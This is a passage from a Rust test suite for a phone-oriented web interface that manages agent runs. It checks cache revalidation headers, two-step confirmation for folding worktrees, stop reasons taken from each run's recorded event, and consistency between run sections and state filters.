10329        // button it named was right there, and unreachable.
10330        let js = fx.get("/app.js").await;
10331        assert_eq!(js.status, 200);
10332        let tag = js
10333            .header("etag")
10334            .expect("an etag to revalidate against")
10335            .to_owned();
10336        assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
10337        assert_eq!(
10338            js.header("cache-control"),
10339            Some("no-cache, must-revalidate"),
10340            "the phone has to ask every time"
10341        );
10342
10343        // And the asking has to be cheap, or `must-revalidate` just means
10344        // "send the whole interface on every load".
10345        let again = fx
10346            .get_with("/app.js", &[("if-none-match", tag.as_str())])
10347            .await;
10348        assert_eq!(
10349            again.status, 304,
10350            "a deck it already has costs one round trip"
10351        );
10352        assert!(again.body.is_empty(), "304 carries no body");
10353
10354        // A weakened tag from a proxy still matches; a different build does
10355        // not, which is the case that has to deliver the new interface.
10356        let weak = fx
10357            .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
10358            .await;
10359        assert_eq!(weak.status, 304);
10360        let stale = fx
10361            .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
10362            .await;
10363        assert_eq!(stale.status, 200, "an older build must be replaced");
10364        assert!(stale.body.contains("renderRunActions"));
10365    }
10366
10367    #[test]
10368    fn the_deck_never_sends_the_operator_to_a_terminal() {
10369        // The whole point of the phone UI is that a terminal is not needed.
10370        // The delete control used to answer with "Run `magi fold` first."
10371        assert!(
10372            !APP_JS.contains("Run `magi fold` first"),
10373            "the deck must offer the fold, not prescribe a shell command"
10374        );
10375        assert!(APP_JS.contains("foldRun:"));
10376        assert!(APP_JS.contains("resumeRun:"));
10377        assert!(APP_JS.contains("renderRunActions"));
10378
10379        // Folding is destructive and armed in two steps, like deleting.
10380        assert!(APP_JS.contains("armedFold"));
10381        assert!(APP_JS.contains("Yes, fold worktrees"));
10382
10383        // And the copy has to say that the two actions are opposites, because
10384        // folding throws away exactly what a resume would continue from.
10385        assert!(APP_JS.contains("can no longer be resumed"));
10386    }
10387
10388    #[test]
10389    fn a_finished_run_explains_itself_with_its_own_last_line() {
10390        // The deck used to answer "why did this stop?" with a sentence chosen
10391        // by status alone. Run e633 stalled because two judges answered with
10392        // the wrong JSON shape and its card said "The panel collapsed on
10393        // agent quota" - with `quota: []` in the record and a quota-loss
10394        // counter right above it that correctly said nothing.
10395        assert!(
10396            !APP_JS.contains("collapsed on agent quota"),
10397            "a stall must not be explained by a cause the deck did not check"
10398        );
10399        assert!(
10400            !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
10401            "and a block must not offer a guess with an `or` in it"
10402        );
10403
10404        // The reason it does have is `run.event`, which must reach finished
10405        // runs: gating it on movement hid the recorded truth at the one moment
10406        // the operator is reading the card to find out what happened.
10407        assert!(
10408            APP_JS.contains("setText(r.event, run.event || \"\")"),
10409            "the run's last line is rendered unconditionally"
10410        );
10411        assert!(
10412            !APP_JS.contains("moving && run.event"),
10413            "and never gated on the run still moving"
10414        );
10415
10416        // Quota keeps its own counter, fed by the number actually recorded.
10417        assert!(APP_JS.contains("lost to quota"));
10418    }
10419
10420    /// The runs tree (section) and the state chips (waiting/done) are two
10421    /// independent lenses ANDed together in `renderRuns`, and some pairings
10422    /// can never both be true for any run - every "Landed"/"Ended" run is
10423    /// done by construction, so pairing either with "Active" or "In flight"
10424    /// always rendered zero cards with the filter bar still claiming
10425    /// `Showing Ended`. `sectionCompatibleWithStateFilter` exists to catch
10426    /// that before it happens, checked against `REPRESENTATIVE_RUN_SHAPES` -
10427    /// a handful of (waiting, status) shapes standing in for the run
10428    /// lifecycle, because `cargo test` cannot execute the front end.
10429    ///
10430    /// That stand-in list is itself the part that drifted twice in review:
10431    /// once shipped with `waiting: true` paired with a done status the
10432    /// lifecycle cannot produce, then over-corrected into treating every
10433    /// waiting run as never done - which made "Waiting on you" look
10434    /// incompatible with "Done" even for the one real, reachable shape
10435    /// (Stalled/Blocked, both terminal yet still resumable) that is exactly
10436    /// that combination. This test parses the shapes and the done-rule back
10437    /// out of `APP_JS`, reimplements `runSection` and the five state
10438    /// predicates independently in Rust, and checks the resulting
10439    /// section/filter compatibility table against the lifecycle rules by
10440    /// hand - so either direction of drift fails it again.
10441    #[test]
10442    fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
10443        let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
10444        let shapes_body_start =
10445            APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
10446        let shapes_close = APP_JS[shapes_body_start..]
10447            .find("].map(")
10448            .expect("the shape list is closed by its done-computing .map(...)")
10449            + shapes_body_start;
10450        let shapes_src = &APP_JS[shapes_body_start..shapes_close];
10451
10452        let mut shapes: Vec<(bool, String, bool)> = Vec::new();
10453        for entry in shapes_src.split('{').skip(1) {
10454            let waiting = entry.contains("waiting: true");
10455            let dead = entry.contains("live: \"dead\"");
10456            let status_at =
10457                entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
10458            let status_end = entry[status_at..]
10459                .find('"')
10460                .expect("the status string is closed")
10461                + status_at;
10462            shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
10463        }
10464        assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
10465
10466        // The done rule itself (`!["implementing"].includes(shape.status)`),
10467        // read out of the source rather than hardcoded, so a renamed
10468        // in-flight status can't silently make every parsed shape "done".
10469        let done_rule_marker = "done: !";
10470        let done_rule_at = APP_JS[shapes_close..]
10471            .find(done_rule_marker)
10472            .expect("the done rule follows the shape list")
10473            + shapes_close
10474            + done_rule_marker.len();
10475        let includes_at = APP_JS[done_rule_at..]
10476            .find(".includes(shape.status)")
10477            .expect("the done rule ends in .includes(shape.status)")
10478            + done_rule_at;
10479        let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
10480            .trim()
10481            .trim_start_matches('[')
10482            .trim_end_matches(']')
10483            .split(',')
10484            .map(|s| s.trim().trim_matches('"'))
10485            .filter(|s| !s.is_empty())
10486            .collect();
10487
10488        let shapes: Vec<(bool, String, bool, bool)> = shapes
10489            .into_iter()
10490            .map(|(waiting, status, dead)| {
10491                let done = !not_done.contains(&status.as_str());
10492                (waiting, status, dead, done)
10493            })
10494            .collect();
10495
10496        // `runSection` reimplemented from assets/ui/app.js: `waiting` wins
10497        // outright, then merged/ready land, stalled/blocked/failed/
10498        // verified_noop end, and everything else is still in flight.
10499        fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
10500            if waiting {
10501                return "waiting";
10502            }
10503            if dead
10504                && !matches!(
10505                    status,
10506                    "merged"
10507                        | "ready"
10508                        | "stalled"
10509                        | "blocked"
10510                        | "failed"
10511                        | "verified_noop"
10512                        | "superseded"
10513                )
10514            {
10515                return "stale";
10516            }
10517            match status {
10518                "merged" | "ready" => "landed",
10519                "stalled" | "blocked" | "failed" | "verified_noop" | "superseded" => "ended",
10520                _ => "flight",
10521            }
10522        }
10523
10524        // RUN_STATE_FILTERS' six `match` functions, reimplemented the same
10525        // way.
10526        fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
10527            match filter_key {
10528                "active" => !done,
10529                "flight" => !done && !waiting && !dead,
10530                "stale" => !done && !waiting && dead,
10531                "waiting" => waiting,
10532                "done" => done,
10533                "all" => true,
10534                other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
10535            }
10536        }
10537
10538        let compatible = |section: &str, filter_key: &str| {
10539            shapes.iter().any(|(waiting, status, dead, done)| {
10540                run_section(*waiting, status, *dead) == section
10541                    && filter_matches(filter_key, *waiting, *dead, *done)
10542            })
10543        };
10544
10545        // One row per RUN_SECTIONS key, in RUN_STATE_FILTERS' own order
10546        // (active, flight, stale, waiting, done, all) - hand-derived from the
10547        // lifecycle, independently of whatever REPRESENTATIVE_RUN_SHAPES
10548        // currently contains.
10549        let expected = [
10550            ("waiting", [true, false, false, true, true, true]),
10551            ("stale", [true, false, true, false, false, true]),
10552            ("flight", [true, true, false, false, false, true]),
10553            ("landed", [false, false, false, false, true, true]),
10554            ("ended", [false, false, false, false, true, true]),
10555        ];
10556        let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
10557
10558        for (section, wants) in expected {
10559            for (filter_key, want) in filter_keys.iter().zip(wants) {
10560                assert_eq!(
10561                    compatible(section, filter_key),
10562                    want,
10563                    "section {section:?} x filter {filter_key:?} should be compatible: {want}"
10564                );
10565            }
10566        }
10567
10568        // The compatibility check exists only to be acted on: both pickers
10569        // must actually consult it rather than just render its answer.
10570        assert!(
10571            APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
10572        );
10573        assert!(APP_JS.contains(
10574            "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
10575        ));
10576        assert!(APP_JS.contains(
10577            "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
10578        ));
10579    }
10580
10581    #[tokio::test]
10582    async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
10583        // An operator-named directory - git checkout or not - is never
10584        // second-guessed, even when it does not exist at all: only the
10585        // flag's own unmodified `.` default is ever eligible for discovery.
10586        let dir = tempfile::tempdir().expect("tempdir");
10587        let explicit = dir.path().join("not-a-checkout");
10588        std::fs::create_dir_all(&explicit).expect("create dir");
10589        assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
10590
10591        let missing = dir.path().join("does-not-exist-at-all");
10592        assert_eq!(normalize_default_repo(missing.clone()).await, missing);
10593    }
10594}